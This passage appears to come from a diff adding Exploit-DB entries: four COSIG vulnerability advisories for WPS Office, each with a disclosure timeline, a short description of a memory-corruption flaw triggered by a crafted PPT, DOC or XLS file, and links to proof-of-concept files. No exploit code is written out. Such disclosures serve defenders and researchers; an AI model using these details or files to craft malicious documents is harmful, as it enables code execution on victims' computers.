suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
(https://en.wikipedia.org/wiki/WPS_Office)
#####################################################################################
============================
2) Report Timeline
============================
2015-11-24: Francis Provencher from COSIG report the issue to WPS;
2015-12-06: WPS security confirm this issue;
2016-01-01: COSIG ask an update status;
2016-01-07: COSIG ask an update status;
2016-01-14: COSIG ask an update status;
2016-01-21: COSIG ask an update status;
2016-02-01: COSIG release this advisory;
#####################################################################################
============================
3) Technical details
============================
The specific flaw exists within the handling of a crafted PPT files with an invalid value into “texttype” in the “clientTextBox”
into a “DrawingContainer”. An heap memory corruption occured and could allow remote attackers to execute arbitrary code
on vulnerable installations of WPS. User interaction is required to exploit this vulnerability, the target must open a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-04.ppt
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39395.zip
###############################################################################

73
platforms/windows/dos/39396.txt Executable file
View file

@ -0,0 +1,73 @@
#####################################################################################
Application: WPS Office
Platforms: Windows
Versions: Version before 2016
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
(https://en.wikipedia.org/wiki/WPS_Office)
#####################################################################################
============================
2) Report Timeline
============================
2015-11-24: Francis Provencher from COSIG report the issue to WPS;
2015-12-06: WPS security confirm this issue;
2016-01-01: COSIG ask an update status;
2016-01-07: COSIG ask an update status;
2016-01-14: COSIG ask an update status;
2016-01-21: COSIG ask an update status;
2016-02-01: COSIG release this advisory;
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WPS.
User interaction is required to exploit this vulnerability, the target must open a malicious file.
The specific flaw exists within the handling of a crafted DOC files with an invalid value into the “OneTableDocumentStream”
data section causing a stackbase memory corruption.
###############################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-05.doc
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39396.zip
###############################################################################

71
platforms/windows/dos/39397.txt Executable file
View file

@ -0,0 +1,71 @@
#####################################################################################
Application: WPS Office
Platforms: Windows
Versions: Version 2016
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
(https://en.wikipedia.org/wiki/WPS_Office)
#####################################################################################
============================
2) Report Timeline
============================
2015-12-31: Francis Provencher from COSIG report the issue to WPS;
2016-01-04: WPS security confirm this issue;
2016-01-14: COSIG ask an update status;
2016-01-21: COSIG ask an update status;
2016-02-01: COSIG release this advisory;
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WPS.
User interaction is required to exploit this vulnerability in that the target must open a malicious file.
The specific flaw exists within the handling of a crafted Presentation files with an invalid “Length” header in a drawingContainer.
By providing a malformed .ppt file, an attacker can cause an memory corruption by dereferencing an uninitialized pointer.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-06.ppt
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39397.zip
###############################################################################

70
platforms/windows/dos/39398.txt Executable file
View file

@ -0,0 +1,70 @@
#####################################################################################
Application: WPS Office
Platforms: Windows
Versions: Version 2016
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
suite for Microsoft Windows, Linux,[1] iOS[3] and Android OS,[4] developed by Zhuhai-basedChinese software developer Kingsoft.
WPS Office is a suite of software which is made up of three primary components: WPS Writer, WPS Presentation, and WPS Spreadsheet.
The personal basic version is free to use, but a watermark is printed on all printed output after the 30 day trial ends.
(https://en.wikipedia.org/wiki/WPS_Office)
#####################################################################################
============================
2) Report Timeline
============================
2015-12-31: Francis Provencher from COSIG report the issue to WPS;
2016-01-04: WPS security confirm this issue;
2016-01-14: COSIG ask an update status;
2016-01-21: COSIG ask an update status;
2016-02-01: COSIG release this advisory;
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WPS.
User interaction is required to exploit this vulnerability in that the target must open a malicious file.
By providing a malformed .xls file, an attacker can cause an heap memory corruption.
An attacker could leverage this to execute arbitrary code under the context of the WPS Spreadsheet process.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-07.xlsx
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39398.zip
###############################################################################